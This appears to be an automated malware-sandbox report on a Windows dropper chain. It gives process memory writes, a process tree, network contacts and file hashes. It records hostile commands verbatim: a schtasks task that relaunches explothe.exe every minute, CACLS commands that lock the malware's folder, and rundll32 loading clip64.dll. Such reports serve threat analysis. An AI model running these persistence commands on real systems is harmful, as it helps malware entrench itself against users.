PID 2492 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2492 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2492 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2492 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2492 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2492 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2492 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2492 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2492 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2492 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2492 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\SysWOW64\WerFault.exe
PID 2492 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\SysWOW64\WerFault.exe
PID 2492 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\SysWOW64\WerFault.exe
PID 2492 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\SysWOW64\WerFault.exe
PID 2492 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\SysWOW64\WerFault.exe
PID 2492 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\SysWOW64\WerFault.exe
PID 2492 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\SysWOW64\WerFault.exe
PID 1220 wrote to memory of 1996 N/A N/A C:\Users\Admin\AppData\Local\Temp\894C.exe
PID 1220 wrote to memory of 1996 N/A N/A C:\Users\Admin\AppData\Local\Temp\894C.exe
PID 1220 wrote to memory of 1996 N/A N/A C:\Users\Admin\AppData\Local\Temp\894C.exe
PID 1220 wrote to memory of 1996 N/A N/A C:\Users\Admin\AppData\Local\Temp\894C.exe
PID 1220 wrote to memory of 1996 N/A N/A C:\Users\Admin\AppData\Local\Temp\894C.exe
PID 1220 wrote to memory of 1996 N/A N/A C:\Users\Admin\AppData\Local\Temp\894C.exe
PID 1220 wrote to memory of 1996 N/A N/A C:\Users\Admin\AppData\Local\Temp\894C.exe
PID 1220 wrote to memory of 2768 N/A N/A C:\Users\Admin\AppData\Local\Temp\8AE2.exe
PID 1220 wrote to memory of 2768 N/A N/A C:\Users\Admin\AppData\Local\Temp\8AE2.exe
PID 1220 wrote to memory of 2768 N/A N/A C:\Users\Admin\AppData\Local\Temp\8AE2.exe
PID 1220 wrote to memory of 2768 N/A N/A C:\Users\Admin\AppData\Local\Temp\8AE2.exe
PID 1996 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\894C.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WS5OY2lM.exe
PID 1996 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\894C.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WS5OY2lM.exe
PID 1996 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\894C.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WS5OY2lM.exe
PID 1996 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\894C.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WS5OY2lM.exe
PID 1996 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\894C.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WS5OY2lM.exe
PID 1996 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\894C.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WS5OY2lM.exe
PID 1996 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\894C.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WS5OY2lM.exe
PID 2796 wrote to memory of 372 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WS5OY2lM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bB1Ol2hS.exe
PID 2796 wrote to memory of 372 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WS5OY2lM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bB1Ol2hS.exe
PID 2796 wrote to memory of 372 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WS5OY2lM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bB1Ol2hS.exe
PID 2796 wrote to memory of 372 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WS5OY2lM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bB1Ol2hS.exe
PID 2796 wrote to memory of 372 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WS5OY2lM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bB1Ol2hS.exe
PID 2796 wrote to memory of 372 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WS5OY2lM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bB1Ol2hS.exe
PID 2796 wrote to memory of 372 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WS5OY2lM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bB1Ol2hS.exe
PID 372 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bB1Ol2hS.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\em6sS5Wk.exe

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2492 -s 276

C:\Users\Admin\AppData\Local\Temp\894C.exe

C:\Users\Admin\AppData\Local\Temp\894C.exe

C:\Users\Admin\AppData\Local\Temp\8AE2.exe

C:\Users\Admin\AppData\Local\Temp\8AE2.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WS5OY2lM.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WS5OY2lM.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bB1Ol2hS.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bB1Ol2hS.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\em6sS5Wk.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\em6sS5Wk.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 132

C:\Users\Admin\AppData\Local\Temp\8DA1.bat

"C:\Users\Admin\AppData\Local\Temp\8DA1.bat"

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\FY0Vk8iU.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\FY0Vk8iU.exe

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1ZO32QK3.exe

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1ZO32QK3.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8ED7.tmp\8ED8.tmp\8EE9.bat C:\Users\Admin\AppData\Local\Temp\8DA1.bat"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 280

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/login

C:\Users\Admin\AppData\Local\Temp\90AE.exe

C:\Users\Admin\AppData\Local\Temp\90AE.exe

C:\Users\Admin\AppData\Local\Temp\A152.exe

C:\Users\Admin\AppData\Local\Temp\A152.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1528 CREDAT:340993 /prefetch:2

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1144 -s 132

C:\Users\Admin\AppData\Local\Temp\A568.exe

C:\Users\Admin\AppData\Local\Temp\A568.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:820 CREDAT:275457 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\CD82.exe

C:\Users\Admin\AppData\Local\Temp\CD82.exe

C:\Users\Admin\AppData\Local\Temp\2EE4.exe

C:\Users\Admin\AppData\Local\Temp\2EE4.exe

C:\Users\Admin\AppData\Local\Temp\4458.exe

C:\Users\Admin\AppData\Local\Temp\4458.exe

C:\Users\Admin\AppData\Local\Temp\4C07.exe

C:\Users\Admin\AppData\Local\Temp\4C07.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {92A2F6A8-C127-430A-A4E9-978AF195ADBC} S-1-5-21-3750544865-3773649541-1858556521-1000:XOCYHKRS\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231010205411.log C:\Windows\Logs\CBS\CbsPersist_20231010205411.cab

Network

Country Destination Domain Proto
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 www.facebook.com udp
RU 5.42.65.80:80 5.42.65.80 tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
US 8.8.8.8:53 facebook.com udp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.35:443 facebook.com tcp
CZ 157.240.30.35:443 facebook.com tcp
US 8.8.8.8:53 fbcdn.net udp
CZ 157.240.30.35:443 fbcdn.net tcp
CZ 157.240.30.35:443 fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 fbsbx.com udp
CZ 157.240.30.35:443 fbsbx.com tcp
CZ 157.240.30.35:443 fbsbx.com tcp
FI 77.91.68.29:80 77.91.68.29 tcp
TR 185.216.70.222:80 185.216.70.222 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
NL 157.240.201.35:443 www.facebook.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
NL 157.240.201.35:443 www.facebook.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 accounts.youtube.com udp
NL 142.250.179.206:443 accounts.youtube.com tcp
NL 142.250.179.206:443 accounts.youtube.com tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
MD 176.123.9.142:37637 tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
NL 142.250.179.206:443 accounts.youtube.com tcp
US 8.8.8.8:53 crls.pki.goog udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 crls.pki.goog udp
US 8.8.8.8:53 www.microsoft.com udp
NL 142.251.36.35:80 crls.pki.goog tcp
NL 142.251.36.35:80 crls.pki.goog tcp
US 172.67.34.170:443 pastebin.com tcp
NL 85.209.176.171:80 85.209.176.171 tcp
US 8.8.8.8:53 tak.soydet.top udp
FI 95.217.246.182:8443 tak.soydet.top tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
NL 142.251.36.14:443 play.google.com tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.12.31:443 api.ip.sb tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe

MD5 b671eaf3ac451a0b31be2410a9ea5531
SHA1 a7b6d74a5e2d6b82c8c48c2de8c2bffc4dc20b0e
SHA256 a77d5f68052550912ad37e82bc67c3ea4b7a8c37bc637e91d2c7831861796ea0
SHA512 61de52376a9197fa31a095b1028431b6be5d9362cd57e772c93d6973001b84dd92b6004a6ad2b16d1aedcf8fb0a7b9fb73bff5be34ae27bbc1cd40e2eab34359

\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe

MD5 b671eaf3ac451a0b31be2410a9ea5531
SHA1 a7b6d74a5e2d6b82c8c48c2de8c2bffc4dc20b0e
SHA256 a77d5f68052550912ad37e82bc67c3ea4b7a8c37bc637e91d2c7831861796ea0
SHA512 61de52376a9197fa31a095b1028431b6be5d9362cd57e772c93d6973001b84dd92b6004a6ad2b16d1aedcf8fb0a7b9fb73bff5be34ae27bbc1cd40e2eab34359

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe

MD5 b671eaf3ac451a0b31be2410a9ea5531
SHA1 a7b6d74a5e2d6b82c8c48c2de8c2bffc4dc20b0e
SHA256 a77d5f68052550912ad37e82bc67c3ea4b7a8c37bc637e91d2c7831861796ea0
SHA512 61de52376a9197fa31a095b1028431b6be5d9362cd57e772c93d6973001b84dd92b6004a6ad2b16d1aedcf8fb0a7b9fb73bff5be34ae27bbc1cd40e2eab34359

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe

MD5 b671eaf3ac451a0b31be2410a9ea5531
SHA1 a7b6d74a5e2d6b82c8c48c2de8c2bffc4dc20b0e
SHA256 a77d5f68052550912ad37e82bc67c3ea4b7a8c37bc637e91d2c7831861796ea0
SHA512 61de52376a9197fa31a095b1028431b6be5d9362cd57e772c93d6973001b84dd92b6004a6ad2b16d1aedcf8fb0a7b9fb73bff5be34ae27bbc1cd40e2eab34359

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe

MD5 56c6e684a2b81e40130a6722ceb889c3
SHA1 000146aac441b6c1d32f9b0591465e25a6ad3626
SHA256 8ec7bd5bf948b1945be502584a03886931fe52e50a84693ba0d0eaac94887a4c
SHA512 661c946b46ec0b481b34666d77c53f5d12268871c4d1be66624a3ebe46ac6cf228aa8b7bd808782f5d43f5fa49bb6459a850e7fa1d7d83e7f6149d4150b308ea

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe

MD5 56c6e684a2b81e40130a6722ceb889c3
SHA1 000146aac441b6c1d32f9b0591465e25a6ad3626
SHA256 8ec7bd5bf948b1945be502584a03886931fe52e50a84693ba0d0eaac94887a4c
SHA512 661c946b46ec0b481b34666d77c53f5d12268871c4d1be66624a3ebe46ac6cf228aa8b7bd808782f5d43f5fa49bb6459a850e7fa1d7d83e7f6149d4150b308ea

\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe

MD5 56c6e684a2b81e40130a6722ceb889c3
SHA1 000146aac441b6c1d32f9b0591465e25a6ad3626
SHA256 8ec7bd5bf948b1945be502584a03886931fe52e50a84693ba0d0eaac94887a4c
SHA512 661c946b46ec0b481b34666d77c53f5d12268871c4d1be66624a3ebe46ac6cf228aa8b7bd808782f5d43f5fa49bb6459a850e7fa1d7d83e7f6149d4150b308ea

\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe

MD5 56c6e684a2b81e40130a6722ceb889c3
SHA1 000146aac441b6c1d32f9b0591465e25a6ad3626
SHA256 8ec7bd5bf948b1945be502584a03886931fe52e50a84693ba0d0eaac94887a4c
SHA512 661c946b46ec0b481b34666d77c53f5d12268871c4d1be66624a3ebe46ac6cf228aa8b7bd808782f5d43f5fa49bb6459a850e7fa1d7d83e7f6149d4150b308ea

\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe

MD5 56c6e684a2b81e40130a6722ceb889c3
SHA1 000146aac441b6c1d32f9b0591465e25a6ad3626
SHA256 8ec7bd5bf948b1945be502584a03886931fe52e50a84693ba0d0eaac94887a4c
SHA512 661c946b46ec0b481b34666d77c53f5d12268871c4d1be66624a3ebe46ac6cf228aa8b7bd808782f5d43f5fa49bb6459a850e7fa1d7d83e7f6149d4150b308ea

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe

MD5 56c6e684a2b81e40130a6722ceb889c3
SHA1 000146aac441b6c1d32f9b0591465e25a6ad3626
SHA256 8ec7bd5bf948b1945be502584a03886931fe52e50a84693ba0d0eaac94887a4c
SHA512 661c946b46ec0b481b34666d77c53f5d12268871c4d1be66624a3ebe46ac6cf228aa8b7bd808782f5d43f5fa49bb6459a850e7fa1d7d83e7f6149d4150b308ea

memory/2688-23-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2688-25-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2688-27-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2688-28-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2688-29-0x0000000000400000-0x0000000000409000-memory.dmp

\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe

MD5 56c6e684a2b81e40130a6722ceb889c3
SHA1 000146aac441b6c1d32f9b0591465e25a6ad3626
SHA256 8ec7bd5bf948b1945be502584a03886931fe52e50a84693ba0d0eaac94887a4c
SHA512 661c946b46ec0b481b34666d77c53f5d12268871c4d1be66624a3ebe46ac6cf228aa8b7bd808782f5d43f5fa49bb6459a850e7fa1d7d83e7f6149d4150b308ea

\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe

MD5 56c6e684a2b81e40130a6722ceb889c3
SHA1 000146aac441b6c1d32f9b0591465e25a6ad3626
SHA256 8ec7bd5bf948b1945be502584a03886931fe52e50a84693ba0d0eaac94887a4c
SHA512 661c946b46ec0b481b34666d77c53f5d12268871c4d1be66624a3ebe46ac6cf228aa8b7bd808782f5d43f5fa49bb6459a850e7fa1d7d83e7f6149d4150b308ea

\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe

MD5 56c6e684a2b81e40130a6722ceb889c3
SHA1 000146aac441b6c1d32f9b0591465e25a6ad3626
SHA256 8ec7bd5bf948b1945be502584a03886931fe52e50a84693ba0d0eaac94887a4c
SHA512 661c946b46ec0b481b34666d77c53f5d12268871c4d1be66624a3ebe46ac6cf228aa8b7bd808782f5d43f5fa49bb6459a850e7fa1d7d83e7f6149d4150b308ea

\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe

MD5 56c6e684a2b81e40130a6722ceb889c3
SHA1 000146aac441b6c1d32f9b0591465e25a6ad3626
SHA256 8ec7bd5bf948b1945be502584a03886931fe52e50a84693ba0d0eaac94887a4c
SHA512 661c946b46ec0b481b34666d77c53f5d12268871c4d1be66624a3ebe46ac6cf228aa8b7bd808782f5d43f5fa49bb6459a850e7fa1d7d83e7f6149d4150b308ea

memory/1220-34-0x0000000002C10000-0x0000000002C26000-memory.dmp

memory/2688-35-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\894C.exe

MD5 e5b41e4d3968f7a551375467bfa61ce5
SHA1 1c586f294bb35f3ebd526d9cb8360e9f81b728e0
SHA256 b524acb6b41d1e5ce707816496e1656ee94685a90b0b03435c1286ff3ae2a94b
SHA512 aad2e0d486fb168f57fb52a8f4b54bbf57f3a006091f7dbc4fc59e99b80b896cbfe81990027ef0a8547317ca283991f2be926151f8b7f5554771ebc0d5730f13

C:\Users\Admin\AppData\Local\Temp\894C.exe

MD5 e5b41e4d3968f7a551375467bfa61ce5
SHA1 1c586f294bb35f3ebd526d9cb8360e9f81b728e0
SHA256 b524acb6b41d1e5ce707816496e1656ee94685a90b0b03435c1286ff3ae2a94b
SHA512 aad2e0d486fb168f57fb52a8f4b54bbf57f3a006091f7dbc4fc59e99b80b896cbfe81990027ef0a8547317ca283991f2be926151f8b7f5554771ebc0d5730f13

\Users\Admin\AppData\Local\Temp\894C.exe

MD5 e5b41e4d3968f7a551375467bfa61ce5
SHA1 1c586f294bb35f3ebd526d9cb8360e9f81b728e0
SHA256 b524acb6b41d1e5ce707816496e1656ee94685a90b0b03435c1286ff3ae2a94b
SHA512 aad2e0d486fb168f57fb52a8f4b54bbf57f3a006091f7dbc4fc59e99b80b896cbfe81990027ef0a8547317ca283991f2be926151f8b7f5554771ebc0d5730f13

C:\Users\Admin\AppData\Local\Temp\8AE2.exe

MD5 f1432a4597fa0744d496cbe8ebd50fd5
SHA1 99e96566aaee582913978531396110bc171101e5
SHA256 85f10bec21a78984acfed0f51a06e75b597b8a880f98e6e76af1438b3f5eef5f
SHA512 d6aed590959077a9fd5299a19ce3538cf943e8da260972d83f471b76e0a98b8570587171abc20fac7acddc44278be2248e9a79ec81435d03105b5949111ff438

\Users\Admin\AppData\Local\Temp\IXP002.TMP\WS5OY2lM.exe

MD5 d05d23fdf50e490bc301d002d304efb5
SHA1 a873ecbd1267ede15f3d1a37cefc57f3af36f614
SHA256 61eec13eea4fd72c903991487e94abc4750ccb2d0a7eff9806bab70518bb4f2a
SHA512 0c47b2ceee392bb4f94690d9ebd45af7108ad59ea651e4f12c6526695055ea38489140a925db275b46779518ed436241b036038c8e3934b762fa78aec44bb30b

\Users\Admin\AppData\Local\Temp\IXP002.TMP\WS5OY2lM.exe

MD5 d05d23fdf50e490bc301d002d304efb5
SHA1 a873ecbd1267ede15f3d1a37cefc57f3af36f614
SHA256 61eec13eea4fd72c903991487e94abc4750ccb2d0a7eff9806bab70518bb4f2a
SHA512 0c47b2ceee392bb4f94690d9ebd45af7108ad59ea651e4f12c6526695055ea38489140a925db275b46779518ed436241b036038c8e3934b762fa78aec44bb30b

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WS5OY2lM.exe

MD5 d05d23fdf50e490bc301d002d304efb5
SHA1 a873ecbd1267ede15f3d1a37cefc57f3af36f614
SHA256 61eec13eea4fd72c903991487e94abc4750ccb2d0a7eff9806bab70518bb4f2a
SHA512 0c47b2ceee392bb4f94690d9ebd45af7108ad59ea651e4f12c6526695055ea38489140a925db275b46779518ed436241b036038c8e3934b762fa78aec44bb30b

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WS5OY2lM.exe

MD5 d05d23fdf50e490bc301d002d304efb5
SHA1 a873ecbd1267ede15f3d1a37cefc57f3af36f614
SHA256 61eec13eea4fd72c903991487e94abc4750ccb2d0a7eff9806bab70518bb4f2a
SHA512 0c47b2ceee392bb4f94690d9ebd45af7108ad59ea651e4f12c6526695055ea38489140a925db275b46779518ed436241b036038c8e3934b762fa78aec44bb30b

\Users\Admin\AppData\Local\Temp\IXP003.TMP\bB1Ol2hS.exe

MD5 8ae472d9f76dffe0e5e4777a25b213a6
SHA1 4600844f6eed0b0da9d07f7f45ee3801f9997e49
SHA256 c5caa04a821f39d86a46d15d4b96b0c1a2a73de3d6a92b667b830c9c1d477ce1
SHA512 e11679e9a022a49a70f5f1f38ec80113615569a3ab65c629fac27259547bddbed1af770939f1d7a2cacf3a0a43f9120b1db399495e210358d865e550e4060cd1

\Users\Admin\AppData\Local\Temp\IXP003.TMP\bB1Ol2hS.exe

MD5 8ae472d9f76dffe0e5e4777a25b213a6
SHA1 4600844f6eed0b0da9d07f7f45ee3801f9997e49
SHA256 c5caa04a821f39d86a46d15d4b96b0c1a2a73de3d6a92b667b830c9c1d477ce1
SHA512 e11679e9a022a49a70f5f1f38ec80113615569a3ab65c629fac27259547bddbed1af770939f1d7a2cacf3a0a43f9120b1db399495e210358d865e550e4060cd1

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bB1Ol2hS.exe

MD5 8ae472d9f76dffe0e5e4777a25b213a6
SHA1 4600844f6eed0b0da9d07f7f45ee3801f9997e49
SHA256 c5caa04a821f39d86a46d15d4b96b0c1a2a73de3d6a92b667b830c9c1d477ce1
SHA512 e11679e9a022a49a70f5f1f38ec80113615569a3ab65c629fac27259547bddbed1af770939f1d7a2cacf3a0a43f9120b1db399495e210358d865e550e4060cd1

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bB1Ol2hS.exe

MD5 8ae472d9f76dffe0e5e4777a25b213a6
SHA1 4600844f6eed0b0da9d07f7f45ee3801f9997e49
SHA256 c5caa04a821f39d86a46d15d4b96b0c1a2a73de3d6a92b667b830c9c1d477ce1
SHA512 e11679e9a022a49a70f5f1f38ec80113615569a3ab65c629fac27259547bddbed1af770939f1d7a2cacf3a0a43f9120b1db399495e210358d865e550e4060cd1

